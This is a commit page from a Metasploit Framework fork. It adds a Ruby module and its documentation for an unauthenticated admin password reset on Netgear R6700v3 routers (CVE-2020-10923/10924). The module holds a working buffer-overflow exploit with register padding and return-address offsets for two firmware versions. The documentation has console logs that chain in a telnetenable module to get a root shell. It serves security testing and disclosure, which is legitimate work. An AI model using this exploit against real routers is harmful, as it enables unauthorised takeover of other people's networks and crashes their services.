dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Land #13768, Netgear R6700 Admin Password Reset (CVE-2020-10923 and CVE-2020-10924)

This commit is contained in:
gwillcox-r7 2020-07-01 14:58:53 -05:00
parent f5e50eb4b0 fdfef2729f
commit c311ea5b5b
No known key found for this signature in database
GPG Key ID: D35E05C0F2B81E83
2 changed files with 470 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

269
documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md Normal file
View File

@ -0,0 +1,269 @@
## Vulnerable Application
This module targets ZDI-20-704 (aka CVE-2020-10924), a buffer overflow vulnerability in the UPNP daemon (/usr/sbin/upnpd),
on Netgear R6700v3 routers running firmware versions from V1.0.2.62 up to but not including V1.0.4.94, to reset
the password for the 'admin' user back to its factory default of 'password'. Authentication is bypassed by
using ZDI-20-703 (aka CVE-2020-10923), an authentication bypass that occurs when network adjacent
computers send SOAPAction UPnP messages to a vulnerable Netgear R6700v3 router. Currently this module only
supports exploiting Netgear R6700v3 routers running either the V1.0.0.4.82_10.0.57 or V1.0.0.4.84_10.0.58
firmware, however support for other firmware versions may be added in the future.
Once the password has been reset, attackers can use the exploit/linux/telnet/netgear_telnetenable module to send a
special packet to port 23/udp of the router to enable a telnet server on port 23/tcp. The attacker can
then log into this telnet server using the new password, and obtain a shell as the "root" user.
These last two steps have to be done manually, as the authors did not reverse the communication with the web interface.
It should be noted that successful exploitation will result in the upnpd binary crashing on the target router.
As the upnpd binary will not restart until the router is rebooted, this means that attackers can only exploit
this vulnerability once per reboot of the router.
This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro +
Radek Domanski).
The vulnerable firmware versions this exploit supports can be downloaded from the following links:
* [Netgear R6700v3 firmware version V1.0.4.82_10.0.57](https://web.archive.org/web/20200630213752if_/https://www.downloads.netgear.com/files/GDC/R6700v3/R6700v3-V1.0.4.82_10.0.57.zip)
* [Netgear R6700v3 firmware version V1.0.4.84_10.0.58](https://web.archive.org/web/20200630213830if_/https://www.downloads.netgear.com/files/GDC/R6700v3/R6700v3-V1.0.4.84_10.0.58.zip)
## Verification Steps
1. Connect the R6700v3 router to your local area network and ensure you can access it.
2. Browse to the admin portal for the router, which will be located by default at `http://192.168.1.1`.
3. Go to Advanced -> Administration -> Set Password
4. Change the password from `password` to another password of your choice.
5. Log out and browse again to `http://192.168.1.1`. Verify that you can log into the router with the new password.
6. Start msfconsole
7. Do: ```use auxiliary/admin/http/netgear_r6700_pass_reset```
8. Set RHOST
9. Run ```check``` and verify that the target is vulnerable.
10. Do: ```run```
11. Browse admin portal for the router, and
verify you can successfully log in with the username `admin` and the password `password`.
## Options
### RHOSTS
IP address of the LAN interface of the vulnerable target.
### RPORT
upnpd port on the target. Default 5000.
## Scenarios
### Netgear R6700v3 firmware version V1.0.4.84_10.0.58
```
msf5 > use auxiliary/admin/http/netgear_r6700_pass_reset
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options
Module options (auxiliary/admin/http/netgear_r6700_pass_reset):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check
[*] Target is running firmware version 1.0.4.84
[*] 192.168.1.1:5000 - The target appears to be vulnerable.
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit
[*] Running module against 192.168.1.1
[*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target.
[+] 192.168.1.1:5000 - HTTP payload sent! 'admin' password has been reset to 'password'
[*] To achieve code execution, do the following steps manually:
[*] 1- Login to 192.168.1.1 with creds 'admin:password', then:
[*] 1.1- go to Advanced -> Administration -> Set Password
[*] 1.2- Change the password from 'password' to <WHATEVER>
[*] 2- Run metasploit as root, then:
[*] 2.1- use exploit/linux/telnet/netgear_telnetenable
[*] 2.2- set interface <INTERFACE_CONNECTED_TO_ROUTER>
[*] 2.3- set rhost 192.168.1.1
[*] 2.3- set username admin
[*] 2.4- set password <WHATEVER>
[*] 2.5- OPTIONAL: set timeout 1500
[*] 2.6- OPTIONAL: set MAC <ROUTERS_MAC>
[*] 2.7- run it and login with 'admin:<WHATEVER>'
[*] 3- Enjoy your root shell!
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) >
```
Browsed to admin page and changed password to `testing123`, then in a new `msfconsole`
session running as `root`, entered the following commands:
```
msf5 > use exploit/linux/telnet/netgear_telnetenable
[*] No payload configured, defaulting to cmd/unix/interact
msf5 exploit(linux/telnet/netgear_telnetenable) > set username admin
username => admin
msf5 exploit(linux/telnet/netgear_telnetenable) > set password testing123
password => testing123
msf5 exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9
MAC => D56C89FC94C9
msf5 exploit(linux/telnet/netgear_telnetenable) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf5 exploit(linux/telnet/netgear_telnetenable) > exploit
[+] 192.168.1.1:23 - Detected telnetenabled on UDP
[+] 192.168.1.1:23 - Using creds admin:testing123
[*] 192.168.1.1:23 - Generating magic packet
[*] 192.168.1.1:23 - Connecting to telnetenabled via UDP
[*] 192.168.1.1:23 - Sending magic packet
[*] 192.168.1.1:23 - Disconnecting from telnetenabled
[*] 192.168.1.1:23 - Waiting for telnetd
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.1:23) at 2020-06-30 15:57:33 -0500
Login incorrect
login: admin
admin
Password: testing123
BusyBox v1.7.2 (2019-10-19 12:12:12 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# id
id
uid=0(admin) gid=0(root)
# uname -a
uname -a
Linux R6700v3 2.6.36.4brcmarm+ #17 SMP PREEMPT Sat Oct 19 11:17:27 CST 2019 armv7l unknown
#
```
### Netgear R6700v3 firmware version V1.0.0.4.82_10.0.57
```
msf5 > use auxiliary/admin/http/netgear_r6700_pass_reset
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options
Module options (auxiliary/admin/http/netgear_r6700_pass_reset):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check
[*] Target is running firmware version 1.0.4.82
[*] 192.168.1.1:5000 - The target appears to be vulnerable.
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit
[*] Running module against 192.168.1.1
[*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.82_10.0.57) as the target.
[+] 192.168.1.1:5000 - HTTP payload sent! 'admin' password has been reset to 'password'
[*] To achieve code execution, do the following steps manually:
[*] 1- Login to 192.168.1.1 with creds 'admin:password', then:
[*] 1.1- go to Advanced -> Administration -> Set Password
[*] 1.2- Change the password from 'password' to <WHATEVER>
[*] 2- Run metasploit as root, then:
[*] 2.1- use exploit/linux/telnet/netgear_telnetenable
[*] 2.2- set interface <INTERFACE_CONNECTED_TO_ROUTER>
[*] 2.3- set rhost 192.168.1.1
[*] 2.3- set username admin
[*] 2.4- set password <WHATEVER>
[*] 2.5- OPTIONAL: set timeout 1500
[*] 2.6- OPTIONAL: set MAC <ROUTERS_MAC>
[*] 2.7- run it and login with 'admin:<WHATEVER>'
[*] 3- Enjoy your root shell!
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) >
```
Browsed to admin page and changed password to `testing123`, then in a new `msfconsole`
session running as `root`, entered the following commands:
```
msf5 > use exploit/linux/telnet/netgear_telnetenable
[*] No payload configured, defaulting to cmd/unix/interact
msf5 exploit(linux/telnet/netgear_telnetenable) > show options
Module options (exploit/linux/telnet/netgear_telnetenable):
Name Current Setting Required Description
---- --------------- -------- -----------
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
MAC no MAC address of device
PASSWORD no Password on device
PCAPFILE no The name of the PCAP capture file to process
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 23 yes The target port (TCP)
SNAPLEN 65535 yes The number of bytes to capture
TIMEOUT 500 yes The number of seconds to wait for new data
USERNAME no Username on device
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic (detect TCP or UDP)
msf5 exploit(linux/telnet/netgear_telnetenable) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
set msf5 exploit(linux/telnet/netgear_telnetenable) > set username admin
username => admin
msf5 exploit(linux/telnet/netgear_telnetenable) > set password testing123
password => testing123
msf5 exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9
MAC => D56C89FC94C9
msf5 exploit(linux/telnet/netgear_telnetenable) > exploit
[+] 192.168.1.1:23 - Detected telnetenabled on UDP
[+] 192.168.1.1:23 - Using creds admin:testing123
[*] 192.168.1.1:23 - Generating magic packet
[*] 192.168.1.1:23 - Connecting to telnetenabled via UDP
[*] 192.168.1.1:23 - Sending magic packet
[*] 192.168.1.1:23 - Disconnecting from telnetenabled
[*] 192.168.1.1:23 - Waiting for telnetd
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.1:23) at 2020-06-30 15:14:08 -0500
Login incorrect
login: admin
admin
Password: testing123
BusyBox v1.7.2 (2019-07-29 20:56:07 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# id
id
uid=0(admin) gid=0(root)
# uname -a
uname -a
Linux R6700v3 2.6.36.4brcmarm+ #17 SMP PREEMPT Mon Jul 29 19:43:55 CST 2019 armv7l unknown
#
```

201
modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb Normal file
View File

@ -0,0 +1,201 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Netgear R6700v3 Unauthenticated LAN Admin Password Reset',
'Description' => %q{
This module targets ZDI-20-704 (aka CVE-2020-10924), a buffer overflow vulnerability in the UPNP daemon (/usr/sbin/upnpd),
on Netgear R6700v3 routers running firmware versions from V1.0.2.62 up to but not including V1.0.4.94, to reset
the password for the 'admin' user back to its factory default of 'password'. Authentication is bypassed by
using ZDI-20-703 (aka CVE-2020-10923), an authentication bypass that occurs when network adjacent
computers send SOAPAction UPnP messages to a vulnerable Netgear R6700v3 router. Currently this module only
supports exploiting Netgear R6700v3 routers running either the V1.0.0.4.82_10.0.57 or V1.0.0.4.84_10.0.58
firmware, however support for other firmware versions may be added in the future.
Once the password has been reset, attackers can use the exploit/linux/telnet/netgear_telnetenable module to send a
special packet to port 23/udp of the router to enable a telnet server on port 23/tcp. The attacker can
then log into this telnet server using the new password, and obtain a shell as the "root" user.
These last two steps have to be done manually, as the authors did not reverse the communication with the web interface.
It should be noted that successful exploitation will result in the upnpd binary crashing on the target router.
As the upnpd binary will not restart until the router is rebooted, this means that attackers can only exploit
this vulnerability once per reboot of the router.
This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro +
Radek Domanski).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>', # Twitter: @pedrib1337. Vulnerability discovery and Metasploit module
'Radek Domanski <radek.domanski[at]gmail.com>', # Twitter: @RabbitPro. Vulnerability discovery and Metasploit module
'gwillcox-r7' # Minor general updates plus updated implementation of the check method to identify a wider range of vulnerable targets.
],
'References' =>
[
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/tokyo_drift/tokyo_drift.md'],
[ 'URL', 'https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders'],
[ 'CVE', '2020-10923'],
[ 'CVE', '2020-10924'],
[ 'ZDI', '20-703'],
[ 'ZDI', '20-704']
],
'Notes' => # Note that reliability isn't included here, as technically the exploit can only
# only be run once, after which the service crashes.
{
'SideEffects' => [ CONFIG_CHANGES ], # This module will change the configuration by
# resetting the router to the default factory password.
'Stability' => [ CRASH_SERVICE_DOWN ] # This module will crash the target service after it is run.
},
'RelatedModules' => [ 'exploit/linux/telnet/netgear_telnetenable' ], # This module relies on users also running exploit/linux/telnet/netgear_telnetenable to get the shell.
'DisclosureDate' => 'Jun 15 2020',
'DefaultTarget' => 0
)
)
register_options(
[
Opt::RPORT(5000)
]
)
end
def retrieve_version
soap =
'<?xml version="1.0"?>'\
"\r\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"\
"\r\n<SOAP-ENV:Body>"\
"\r\nSetDeviceNameIconByMAC"\
"\r\n<NewBlockSiteName>1"\
"\r\n</NewBlockSiteName>"\
"\r\n</SOAP-ENV:Body>"\
"\r\n</SOAP-ENV:Envelope>"
# the GetInfo method will helpfully report the firmware version to an unauth request
headers = 'SOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo'
res = send_request_cgi({
'uri' => '/soap/server_sa',
'method' => 'POST',
'raw_headers' => headers,
'data' => soap
})
if res.nil?
fail_with(Failure::Unreachable, "Failed to obtain device version: Target didn't respond")
elsif (res.body.to_s == '') || (res.code != 200)
fail_with(Failure::UnexpectedReply, 'Failed to obtain device version: Unexpected response code')
end
version = res.body.to_s
version = version.scan(/V\d\.\d\.\d\.\d{1,2}/) # Try find a version number in the format V1.2.3.48 or similar.
if version.nil? # Check we actually got a result.
fail_with(Failure::UnexpectedReply, 'Failed to obtain device version: no version number found in response') # Taken from https://stackoverflow.com/questions/4115115/extract-a-substring-from-a-string-in-ruby-using-a-regular-expression
end
raw_version_number = version[0].gsub('V', '') # If we got a result, then take the first result from the returned array, and remove the leading 'V'.
Gem::Version.new(raw_version_number) # Finally lets turn it into a Gem::Version object for later use in other parts of the code.
end
def check
target_version = retrieve_version
print_status("Target is running firmware version #{target_version}")
if (target_version < Gem::Version.new('1.0.4.94')) && (target_version >= Gem::Version.new('1.0.2.62'))
return Exploit::CheckCode::Appears
else
return Exploit::Checkcode::Safe
end
end
def find_offset
target_version = retrieve_version
if target_version == Gem::Version.new('1.0.4.84')
print_status("#{peer} - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target.")
# this offset is where execution will jump to
# a part in the middle of the binary that resets the admin password
return "\x58\x9a\x03"
elsif target_version == Gem::Version.new('1.0.4.82')
print_status("#{peer} - Identified Netgear R6700v3 (firmware V1.0.0.4.82_10.0.57) as the target.")
return "\x48\x9a\x03"
end
end
def run
offset = find_offset
if !offset
fail_with(Failure::NoTarget, 'Identified firmware version is not supported. Please contact the authors.')
end
headers =
"SOAPAction: urn:NETGEAR-ROUTER:service:DeviceConfig:1#SOAPLogin\nSOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#Whatever"
payload =
'<?xml version="1.0"?>'\
"\r\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"\
"\r\n<SOAP-ENV:Body>"\
"\r\nSetDeviceNameIconByMAC"\
"\r\n<NewBlockSiteName>1"
# filler
payload += Rex::Text.rand_text_alpha(1028)
# $r4
payload += Rex::Text.rand_text_alpha(4)
# $r5
payload += Rex::Text.rand_text_alpha(4)
# $r6
payload += Rex::Text.rand_text_alpha(4)
# $r7
payload += Rex::Text.rand_text_alpha(4)
# $r8
payload += Rex::Text.rand_text_alpha(4)
# $lr (AKA return address)
payload += offset
# trailer
payload +=
"\r\n</NewBlockSiteName>"\
"\r\n</SOAP-ENV:Body>"\
"\r\n</SOAP-ENV:Envelope>"
headers.gsub! "\n", "\r\n"
payload.gsub! "\n", "\r\n"
# MSF adds content len automatically.
# Unfortunately this appears before the raw headers hash, but doesn't appear to have ill effects
headers += "\r\n"
res = send_request_cgi({
'uri' => '/soap/server_sa',
'method' => 'POST',
'raw_headers' => headers,
'data' => payload
})
if res
# no response is received in case of success
fail_with(Failure::UnexpectedReply, 'Failed to send HTTP payload... try again?')
else
print_good("#{peer} - HTTP payload sent! 'admin' password has been reset to 'password'")
print_status('To achieve code execution, do the following steps manually:')
print_status("1- Login to #{rhost} with creds 'admin:password', then:")
print_status("\t1.1- go to Advanced -> Administration -> Set Password")
print_status("\t1.2- Change the password from 'password' to <WHATEVER>")
print_status('2- Run metasploit as root, then:')
print_status("\t2.1- use exploit/linux/telnet/netgear_telnetenable")
print_status("\t2.2- set interface <INTERFACE_CONNECTED_TO_ROUTER>")
print_status("\t2.3- set rhost #{rhost}")
print_status("\t2.3- set username admin")
print_status("\t2.4- set password <WHATEVER>")
print_status("\t2.5- OPTIONAL: set timeout 1500")
print_status("\t2.6- OPTIONAL: set MAC <ROUTERS_MAC>")
print_status("\t2.7- run it and login with 'admin:<WHATEVER>'")
print_status('3- Enjoy your root shell!')
end
end
end